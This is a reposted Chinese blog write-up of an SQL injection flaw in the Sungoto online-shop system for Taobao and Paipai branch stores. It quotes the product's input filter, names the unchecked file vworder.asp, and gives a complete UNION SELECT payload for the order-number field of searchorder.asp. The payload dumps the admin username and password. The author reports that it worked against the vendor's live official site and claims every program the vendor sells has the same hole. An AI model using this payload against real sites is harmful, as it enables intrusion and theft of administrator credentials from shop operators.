【转载】商达讯网店系统淘宝拍拍分店版注射

  • A+
所属分类:lcx

官网:http://www.sungoto.com/

程序我感觉是抄袭的。不过又说不出来,到底抄袭的哪个程序。先随便看了下代码,发现到了每一个变量都用了
SafeRequest()这个函数来检查。看了下,才发现原来是这个作用。

Function SafeRequest(ParaName,ParaType)
       Dim ParaValue
       ParaValue=Request(ParaName)
       If ParaType=1 then
              If not isNumeric(ParaValue) then
                     Response.write "

参数" & ParaName & "必须为数字型,请正确操作!
"
                     Response.end
              End if
       Else
              ParaValue=replace(ParaValue,"'","''")
       End if
       SafeRequest=ParaValue
End function

这个时候凡是遇到有SafeRequest()的我都没去看了。
就这样我找到了vworder.asp这个文件,这个文件里的变量没有做任何检查就执行了查询。

 

由于是post提交。所以我们来到searchorder.asp页面

由于是post提交。所以我们来到searchorder.asp页面 

 

在订单号里输入:

1' and 1=2 union select 1,2,3,4,5,6,userpassword,8,9,10,11,12,13,14,admin,16,17,18,19,20,21,22,23,24 from admin where ''='

然后会发现管理员的用户密码被爆了出来~官网测试如下:

 

 

最后我发现官网所有的程序都有这个漏洞,但需要更改查询的语句才能爆出密码。

文章来源于lcx.cc:【转载】商达讯网店系统淘宝拍拍分店版注射

相关推荐: 【VC】C、C++ void 无类型函数功能详解

    void 无类型函数功能详解     中文翻译为“无类型”。常用在程序编写中对定义函数的参数类型、返回值、函数中指针类型进行声明。     void 表示函数返回值类型是无类型,也就是什么都不返回。如果函数没有返回值,一定要声明为void类型。 voi…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: